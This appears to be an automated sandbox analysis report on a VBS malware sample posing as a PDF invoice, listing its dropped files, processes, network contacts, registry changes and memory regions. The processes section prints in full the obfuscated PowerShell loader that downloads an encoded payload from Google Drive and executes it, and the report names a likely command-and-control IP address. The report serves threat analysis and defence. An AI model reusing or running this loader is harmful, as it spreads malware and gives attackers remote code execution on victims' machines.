Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tgk4xkj.rz5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afmvo5dc.y3v.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moapwhuv.uif.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qiely0ic.ldy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Smaalige.Eks
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism
Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If
($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for(
$Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function
rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea
Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam;
Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit
SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1
umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge
';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm
tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm
gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko
euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr
';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog
Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr
chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT
rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB
urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui
mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn
Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver
er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly
tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi
');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj
R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem
Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb
'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort
Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb
' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma
ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi)
Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago
nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,)
Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el
Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada
Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa
Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc
Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir:
eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp
IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad
ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme
(atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu
Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil
Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY
uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani
:EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar
OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg
.omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo
guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA
FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme
rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri
:TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea
mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk
ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen
edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism
Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If
($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for(
$Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function
rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea
Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam;
Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit
SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1
umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge
';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm
tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm
gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko
euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr
';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog
Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr
chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT
rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB
urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui
mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn
Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver
er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly
tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi
');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj
R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem
Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb
'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort
Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb
' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma
ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi)
Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago
nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,)
Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el
Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada
Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa
Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc
Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir:
eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp
IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad
ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme
(atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu
Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil
Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY
uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani
:EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar
OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg
.omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo
guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA
FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme
rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri
:TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea
mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk
ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen
edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
There are 9 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://137.184.191.215/index.php/10899
|
137.184.191.215
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://drive.googPz
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://wordpress.org/documentation/article/faq-troubleshooting/
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com/s.cn
|
unknown
|
||
|
https://drive.usercontent.google.com/S
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.usercontent.googhh
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://drive.usercontent.google.com/earc%(
|
unknown
|
There are 18 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
18.31.95.13.in-addr.arpa
|
unknown
|
|
|
|
drive.google.com
|
142.250.186.46
|
||
|
drive.usercontent.google.com
|
142.250.184.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
137.184.191.215
|
unknown
|
United States
|
|
|
|
142.250.186.46
|
drive.google.com
|
United States
|
||
|
142.250.184.193
|
drive.usercontent.google.com
|
United States
|
||
|
216.58.206.46
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\????????????????????????????????????
|
188E93
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5C5B000
|
trusted library allocation
|
page read and write
|
|
|
|
A8DE000
|
direct allocation
|
page execute and read and write
|
|
|
|
8A30000
|
direct allocation
|
page execute and read and write
|
|
|
|
1F3C0564000
|
trusted library allocation
|
page read and write
|
|
|
|
603C000
|
heap
|
page read and write
|
|
|
|
165C4470000
|
heap
|
page read and write
|
||
|
1F3B0A48000
|
trusted library allocation
|
page read and write
|
||
|
165C4553000
|
heap
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
3020000
|
trusted library allocation
|
page read and write
|
||
|
165C4549000
|
heap
|
page read and write
|
||
|
165C63B6000
|
heap
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E5C5FF000
|
stack
|
page read and write
|
||
|
4E5C9FF000
|
stack
|
page read and write
|
||
|
8555000
|
heap
|
page read and write
|
||
|
165C6283000
|
heap
|
page read and write
|
||
|
165C63B4000
|
heap
|
page read and write
|
||
|
6074000
|
heap
|
page read and write
|
||
|
1F3B2282000
|
trusted library allocation
|
page read and write
|
||
|
165C63CB000
|
heap
|
page read and write
|
||
|
858F000
|
heap
|
page read and write
|
||
|
7FF848CFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E5C8FE000
|
stack
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
1F3B092B000
|
trusted library allocation
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFA000
|
trusted library allocation
|
page read and write
|
||
|
2150E000
|
stack
|
page read and write
|
||
|
1F3B226F000
|
trusted library allocation
|
page read and write
|
||
|
1F3B0477000
|
heap
|
page execute and read and write
|
||
|
215CF000
|
stack
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
1F3B0332000
|
heap
|
page read and write
|
||
|
532E000
|
remote allocation
|
page execute and read and write
|
||
|
1F3B0995000
|
trusted library allocation
|
page read and write
|
||
|
7661000
|
heap
|
page read and write
|
||
|
33C8000
|
trusted library allocation
|
page read and write
|
||
|
2179E000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
8535000
|
heap
|
page read and write
|
||
|
76AB000
|
heap
|
page read and write
|
||
|
5FB0000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
1F3C88C4000
|
heap
|
page read and write
|
||
|
8559000
|
heap
|
page read and write
|
||
|
70E0000
|
direct allocation
|
page read and write
|
||
|
2175D000
|
stack
|
page read and write
|
||
|
1F3B22A8000
|
trusted library allocation
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
30EE000
|
stack
|
page read and write
|
||
|
4ACE000
|
stack
|
page read and write
|
||
|
6250000
|
direct allocation
|
page read and write
|
||
|
BCDE000
|
direct allocation
|
page execute and read and write
|
||
|
165C63EC000
|
heap
|
page read and write
|
||
|
165C6406000
|
heap
|
page read and write
|
||
|
3045000
|
trusted library allocation
|
page execute and read and write
|
||
|
2160D000
|
stack
|
page read and write
|
||
|
6077000
|
heap
|
page read and write
|
||
|
3100000
|
trusted library allocation
|
page execute and read and write
|
||
|
21915000
|
direct allocation
|
page read and write
|
||
|
1F3B0981000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
heap
|
page read and write
|
||
|
75EEA37000
|
stack
|
page read and write
|
||
|
21150000
|
